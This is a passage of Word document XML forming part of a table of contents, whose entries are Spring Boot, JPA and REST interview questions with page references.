            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>846</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="417BF5E0" w14:textId="05BD003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2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I have a URL and I hit the URL, so which is the first class which is invoked in our product?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308121 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>849</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4B94664B" w14:textId="3522166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2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If you have to expose a new endpoint, what steps will you follow?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308122 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>850</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="172535DF" w14:textId="00352AE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2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Bean and @Configuration?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308123 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>852</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="099071B3" w14:textId="333CFAB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2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RequestParam and PathVariable? Give me one example with one URL?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308124 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>853</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="056690A9" w14:textId="1A2239F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2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change the port of the embedded tomcat server in Spring boot? Write a syntax for that?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308125 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>854</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4AC85273" w14:textId="50C0462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2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are Profiles in Spring boot applications? Give one example?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308126 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>855</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="020FE251" w14:textId="2620119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2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ich annotations are we using in order to use the Exception?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308127 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>856</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3669FD6A" w14:textId="774E113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2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default scope for spring beans?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308128 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>858</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1B2BA9FF" w14:textId="7C85EAF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2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ich database have you used? How do you integrate databases with JPA?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308129 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>858</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="752567FC" w14:textId="16041A4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3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communicate between two spring boot applications using asynchronous calls?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308130 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>860</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="37133246" w14:textId="20EBC1F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3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ave you worked messaging services?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308131 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>863</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="767C677E" w14:textId="4F9E946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3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will you handle errors / exceptions in your project?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308132 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>865</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1D9B323B" w14:textId="25D4BE5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3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are you keeping track of logs in your project?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308133 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>866</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="65E2B2CF" w14:textId="7D5F731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3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If you have millions of data then how will you manage it?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308134 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>867</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="44F2A3F0" w14:textId="708D229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3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difference between REST API and Http?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308135 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>868</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2B8807E1" w14:textId="14731B7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3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Autowired usage?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308136 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>868</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1CA3067A" w14:textId="0A0F106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3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can we handle a yaml file when it is exposed?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308137 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>869</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="353C3197" w14:textId="1D4C79D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3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externalize variables in spring boot?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308138 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>870</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="61473B54" w14:textId="62D9043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3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a novel based server?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308139 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>871</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="04BBFEAE" w14:textId="159AC8F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4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will the findById or findByName method in the repository work with name? When we go with camelcase then where is it implemented internally?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308140 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>871</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3B2601AC" w14:textId="37CC6DD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4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does the JPA Repository know there is a class?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308141 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>872</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3C1B009F" w14:textId="21C46F7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4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will you authenticate API in Spring Boot?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308142 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>874</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="72F3A522" w14:textId="4333AB8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4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In the Spring REST API what is the White label error accessing from the browser? What is the status code you will get?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308143 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>877</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0812ED3C" w14:textId="6FD85D8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4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Entity, @Table, and @Id in JPA?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308144 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>878</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5923CF37" w14:textId="303323B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4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do you secure a Spring Boot application?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308145 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>879</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4DD16891" w14:textId="494771F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4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do you write unit tests in Spring Boot?</w:t>
